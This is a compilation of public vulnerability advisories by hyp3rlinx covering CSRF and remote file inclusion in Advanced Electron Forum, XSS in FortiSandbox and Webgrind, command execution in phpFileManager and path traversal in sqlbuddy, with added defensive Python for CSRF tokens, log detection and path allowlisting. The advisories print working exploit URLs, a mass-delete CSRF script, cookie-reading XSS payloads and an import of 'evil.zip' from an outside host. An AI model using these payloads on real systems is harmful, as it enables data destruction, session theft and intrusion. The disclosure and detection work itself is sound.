Vulnerable Parameter(s): [+] 'fredirect'

by hyp3rlinx
Advanced Electron Forum v1.0.9 CSRF
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-CSRF.txt

Vendor:
===
www.anelectron.com/downloads/

Product:
===
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched in current version.

Vulnerability Type:
===
CSRF

CVE Reference:
===
N/A

Vulnerability Details:
===
In the Admin panel no CSRF protections exist in multiple areas, allowing remote attackers to make HTTP requests on behalf of a victim who currently has a valid session (is logged in) and visits or clicks a malicious link, resulting in some of the following:

0x01: Change current database settings
0x02: Delete all Inbox / Sent Emails
0x03: Delete all 'shouts'
0x04: Delete all Topics

Edit profile, avatar and more all seem vulnerable as well.

Exploit code(s):
===
CSRF 0x01: change mysql db settings
note: you will need to know or guess the database name.

http://localhost/AEF(1.0.9)_Install/index.php?act=admin=conpan=mysqlset" method="post" name="mysqlsetform">
document.getElementById('DOOM').submit()

CSRF 0x02: Delete all Inbox / Sent emails...

http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=sentitems" method="post">
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=inbox" method="post">

//Sent Email IDs seem to be stored using even numbers 2,4,6 etc...
//Inbox Email IDs seem to use odd numbers
var c=-1
var uwillsuffer;
var amttodelete=1
var inbox=document.getElementById("inbox")
var outbox=document.getElementById("sent")

function RUIN_EVERYTHING(){
  c++
  //Inbox IDs are even numbered Sent are odd.
  if(c % 2 == 0){
    arguments[3].value=c
    document.getElementById(arguments[1]).submit()
  }else{
    arguments[2].value=c
    document.getElementById(arguments[0]).submit()
  }
  if(c>=amttodelete){
    clearInterval(uwillsuffer)
    alert("Done!")
  }
}

uwillsuffer = setInterval(RUIN_EVERYTHING, 1000, "DOOM", "DESTRUCT", inbox, outbox)

CSRF 0x03: Delete all 'Shouts'

http://localhost/AEF(1.0.9)_Install/index.php?act=admin=conpan=shoutboxset" method="post">
document.getElementById('SPECTOR_OF_HATE').submit()

CSRF 0x04: Delete all 'Topics' via a simple GET request; this will delete topics 1 thru 7...

http://localhost/AEF(1.0.9)_Install/index.php?act=deletetopic=7,6,5,4,3,2,1

Disclosure Timeline:
===
Vendor Notification: NA
January 17, 2016 : Public Disclosure

Exploitation Technique:
===
Remote

Severity Level:
===
High

Description:
===
Request Method(s): [+] POST / GET
Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)

by hyp3rlinx
Advanced Electron Forum v1.0.9 RFI / CSRF
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-RFI.txt

Vendor:
===
www.anelectron.com/downloads/

Product:
===
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched in current version.

Vulnerability Type:
===
Remote File Inclusion / CSRF

CVE Reference:
===
N/A

Vulnerability Details:
===
In the Admin control panel there is an option to Import Skins, and one choice is to use a web URL.

From AEF: "Specify the URL of the theme on the net. The theme file must be a compressed archive (zip, tgz, tbz2, tar)."

However, there is no CSRF token or check that this is a valid request made by the currently logged in user, so an attacker can trigger arbitrary remote file imports if the user visits or clicks a malicious link. Victims are then left open to arbitrary malicious file downloads from anywhere on the net, which may be used as a platform for further attacks...

Exploit code(s):
===
http://localhost/AEF(1.0.9)_Install/index.php?act=admin=skin=import" method="post">
http://hyp3rlinx.altervista.org/evil.zip; />
document.getElementById('EL-DOWNLOADO').submit()

Disclosure Timeline:
===
Vendor Notification: NA
January 17, 2016 : Public Disclosure

Exploitation Technique:
===
Remote

Severity Level:
===
High

Description:
===
Request Method(s): [+] POST
Vulnerable Product: [+] Advanced Electron Forum v1.0.9 (AEF)

by hyp3rlinx
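The request guard that both AEF CSRF advisories above (the admin/usercp forms and the skin import) show missing, as an added Python example that is not AEF's own code; the action names are taken from the exploit URLs, while "skin-import" and the session dict are assumptions.

```python
import hmac
import secrets

# actions the advisories show being triggered with no token check (names from the URLs above;
# "skin-import" is an assumed shorthand for the admin skin import form)
STATE_CHANGING = {"mysqlset", "sentitems", "inbox", "shoutboxset", "deletetopic", "skin-import"}

def issue_token(session):
    """Create, once per session, the secret every state-changing form must echo back."""
    if "csrf" not in session:
        session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]

def is_request_allowed(session, method, action, submitted_token):
    """Return (allowed, reason): read-only actions pass, mutations need POST plus a valid token."""
    if action not in STATE_CHANGING:
        return True, "read-only action"
    if method != "POST":
        # the deletetopic link in CSRF 0x04 works precisely because a bare GET mutates state
        return False, "state-changing action must not be reachable via " + method
    expected = session.get("csrf")
    if not expected or submitted_token is None:
        return False, "missing CSRF token"
    # constant-time compare; a form hosted on an attacker's site cannot read the victim's token
    if not hmac.compare_digest(expected, submitted_token):
        return False, "CSRF token mismatch"
    return True, "token verified"

def csrf_demo():
    """Constructed requests mirroring the advisories, in order: GET delete link, auto-submitted
    mysqlset form, skin import with a guessed token, genuine admin submission, read-only view."""
    session = {"user": "admin"}          # assumed server-side session store
    token = issue_token(session)
    return [
        is_request_allowed(session, "GET", "deletetopic", None)[0],
        is_request_allowed(session, "POST", "mysqlset", None)[0],
        is_request_allowed(session, "POST", "skin-import", "guessed")[0],
        is_request_allowed(session, "POST", "skin-import", token)[0],
        is_request_allowed(session, "GET", "viewtopic", None)[0],
    ]
```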
Multiple XSS vulnerabilities in FortiSandbox WebUI
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTISANDBOX-0801.txt

Vendor:
===
www.fortinet.com
PSIRT ID: 1418018

Product:
===
FortiSandbox 3000D v2.02 build0042

Vulnerability Type:
===
XSS

CVE Reference:
===
Pending

Advisory Information:
===
Multiple XSS vulnerabilities in FortiSandbox WebUI

Impact
A remote unauthenticated attacker may be able to execute arbitrary code in the security context of an authenticated user's browser session.

Affected Products
FortiSandbox 2.0.4 and lower.

Solutions
Upgrade to FortiSandbox 2.1 or above.

Vulnerability Details:
===
http://www.fortiguard.com/advisory/FG-IR-15-019/

The Web User Interface of FortiSandbox version 2.0.4 and below is vulnerable to multiple reflected Cross-Site Scripting vulnerabilities. 5 potential XSS vectors were identified:

* Fortiview threats by users search filtered by serial
* Fortiview threats by users search filtered by vdom
* Export report feature in the Fortiview search page
* Screenshot download generated by the VM scan feature
* PCAP file download generated by the VM scan feature

Exploit code(s):
===
1) https://localhost/alerts/summary/profile/?prof_type=byusers-profile&from=byusers-filter&username=10.10.10.10&serial=<script>alert(666)</script><script>alert('XSS by hyp3rlinx 06012015')</script>&vdom=&from_time_period=1440#frag-1

vulnerable parameter: serial

--

2) https://localhost/csearch/report/export/?urlForCreatingReport=<script>alert(666)</script><script>alert('XSS by hyp3rlinx June 1, 2015')</script>

vulnerable parameter: urlForCreatingReport

--

3) https://localhost/analysis/detail/download/screenshot?id=/<script>alert('XSS by hyp3rlinx June 1, 2015 '%2bdocument.cookie)</script>

vulnerable parameter: id

--

Disclosure Timeline:
===
Vendor Notification: June 1, 2015
Vendor Disclosure: July 24, 2015
August 1, 2015 : Public Disclosure
Fixed In Firmware 2.1

Discovery Status:
===
Published

Exploitation Technique:
===
Remote unauthenticated

Severity Level:
===
Medium

Description:
===
Request Method(s): [+] GET
Vulnerable Product: [+] FortiSandbox 3000D v2.02
Vulnerable Parameter(s): [+] serial, urlForCreatingReport, id
Affected Area(s): [+] FortiSandbox Web Admin UI

by hyp3rlinx
phpFileManager 0.9.8 Remote Command Execution
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0728.txt

Vendor:
===
phpfm.sourceforge.net

Product:
===
phpFileManager version 0.9.8

Vulnerability Type:
===
Remote Command Execution

CVE Reference:
===
N/A

Advisory Information:
===
Remote Command Execution Vulnerability

Vulnerability Details:
===
phpFileManager is vulnerable to remote command execution: it will run operating system commands via GET requests issued from a victim's browser, e.g. by getting the victim to click a malicious link or visit a malicious website.

Exploit code(s):
===
Remote Command Execution:

1- call Windows cmd.exe
https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe

2- Run Windows calc.exe
https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\calc.exe

Disclosure Timeline:
===
Vendor Notification: NA
July 28, 2015 : Public Disclosure

Severity Level:
===
High

Description:
===
Request Method(s): [+] GET
Vulnerable Product: [+] phpFileManager 0.9.8
Vulnerable Parameter(s): [+] 'cmd'= [OS command]
Affected Area(s): [+] Operating System

by hyp3rlinx
Webgrind XSS vulnerability
Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source: http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt

Vendor: https://github.com/jokkedk/webgrind

Product: Webgrind is an Xdebug profiling web frontend in PHP.

Advisory Information:
===
Webgrind is vulnerable to cross site scripting attacks.

Exploit code:
===
http://localhost/webgrind/index.php?op=fileviewer&file=%3Cscript%3Ealert('XSS hyp3rlinx')%3C/script%3E

Disclosure Timeline:
===
Vendor Notification: May 19, 2015
May 20, 2015: Public Disclosure

Severity Level:
===
Med

Description:
===
Request Method(s): [+] GET
Vulnerable Product: [+] Webgrind
Vulnerable Parameter(s): [+] file=[XSS]
Affected Area(s): [+] Current user.

(hyp3rlinx)
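Detection logic for the GET-parameter attacks in the phpFileManager, FortiSandbox and Webgrind advisories above, as an added example that is not part of any of those advisories; the log lines are constructed, and the product path fragments and parameter names are taken from the exploit URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# product path fragment -> {parameter: kind}; parameters and paths come from the exploit URLs above
WATCHED = {
    "/phpfilemanager": {"cmd": "rce"},
    "/webgrind/": {"file": "xss"},
    "/alerts/summary/profile/": {"serial": "xss", "vdom": "xss"},
    "/csearch/report/export/": {"urlforcreatingreport": "xss"},
    "/analysis/detail/download/screenshot": {"id": "xss"},
}
XSS_MARKERS = ("<script", "onmousemove=", "onerror=", "javascript:")
# combined-log-format request line: client, timestamp, method, target, status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def is_suspicious(kind, value):
    v = unquote(unquote(value)).lower()   # second decode catches double-encoded payloads
    if kind == "xss":
        return any(marker in v for marker in XSS_MARKERS)
    # phpFileManager's 'cmd' takes an OS command by design: any non-empty value deserves an alert
    return kind == "rce" and bool(v.strip())

def scan_line(line):
    """Return a finding dict for an attack request, or None for a benign or unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    for fragment, params in WATCHED.items():
        if fragment not in url.path.lower():
            continue
        query = {k.lower(): v for k, v in parse_qs(url.query, keep_blank_values=True).items()}
        for name, kind in params.items():
            for value in query.get(name, []):
                if is_suspicious(kind, value):
                    return {"ip": m.group("ip"), "path": url.path, "param": name,
                            "kind": kind, "value": unquote(value)[:80]}
    return None

def scan_log(lines):
    return [finding for finding in map(scan_line, lines) if finding]

# constructed sample lines: phpFileManager 'cmd' abuse, a double-encoded FortiSandbox 'serial'
# payload, and a benign Webgrind file view that must not alert
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Jul/2015:10:01:02 +0000] "GET /phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/&cmd=c%3A%5CWindows%5Csystem32%5Ccalc.exe HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jun/2015:09:00:00 +0000] "GET /alerts/summary/profile/?prof_type=byusers-profile&serial=%253Cscript%253Ealert(666)%253C/script%253E HTTP/1.1" 200 2048',
    '10.0.0.7 - - [20/May/2015:08:00:00 +0000] "GET /webgrind/index.php?op=fileviewer&file=index.php HTTP/1.1" 200 100',
]
```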
Sqlbuddy Path Traversal Vulnerability
Exploit Author: John Page (hyp3rlinx)
Website: hyp3rlinx.altervista.org/
Vendor Homepage: www.sqlbuddy.com
Version: 1.3.3

SQL Buddy is an open source web based MySQL administration application.

Advisory Information:
===
sqlbuddy suffers from directory traversal whereby a user can move about directories and read any PHP and non-PHP files (e.g. .doc, .txt, .xml, .conf, .sql etc...) by appending the '#' hash character when requesting files via URLs. With the '#' character added as a delimiter, any non-PHP file will be returned and rendered, subverting the .php concatenation used by sqlbuddy when requesting PHP pages via the POST method.

Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=xx

POC Exploit payloads:
===
1-Read from Apache restricted directory under htdocs:
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#

2-Read any arbitrary files that do not have .PHP extensions:
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#

3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo

Severity Level:
===
High

Request Method(s): [+] POST
Vulnerable Product: [+] sqlbuddy 1.3.3
Vulnerable Parameter(s): [+] #page=somefile
Affected Area(s): [+] Server directories sensitive files

Solution - Fix Patch:
===
N/A
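An added example, not sqlbuddy's own code: it models the page + ".php" URL build the advisory describes (assumed to happen in the browser, since the payload sits in the URL fragment) to show why a trailing '#' strips the extension, next to a hardened build; BASE and ALLOWED_PAGES are assumptions.

```python
from urllib.parse import urljoin, urlsplit

BASE = "http://localhost/sqlbuddy/"           # assumed install location, as in the advisory URLs
ALLOWED_PAGES = {"home", "browse", "query"}    # assumed allowlist of real page names

def requested_path_vulnerable(page):
    """What the browser actually asks the server for when page + '.php' is concatenated blindly.
    urljoin resolves the '../' segments the way a browser does, and a '#' inside 'page'
    turns the appended '.php' into a fragment that never reaches the server."""
    parts = urlsplit(urljoin(BASE, page + ".php"))
    return parts.path, parts.fragment

def requested_path_hardened(page):
    """Accept only a bare allowlisted page name; anything with '/', '..' or '#' is rejected
    simply because it is not in the allowlist, so no blacklist of characters is needed."""
    if page not in ALLOWED_PAGES:
        return None
    return urlsplit(urljoin(BASE, page + ".php")).path

def sqlbuddy_demo():
    attack = "../../../restricted/user_pwd.sql#"   # payload 1 from the advisory
    return {
        "vulnerable": requested_path_vulnerable(attack),
        "hardened": requested_path_hardened(attack),
        "legit": requested_path_hardened("home"),
    }
```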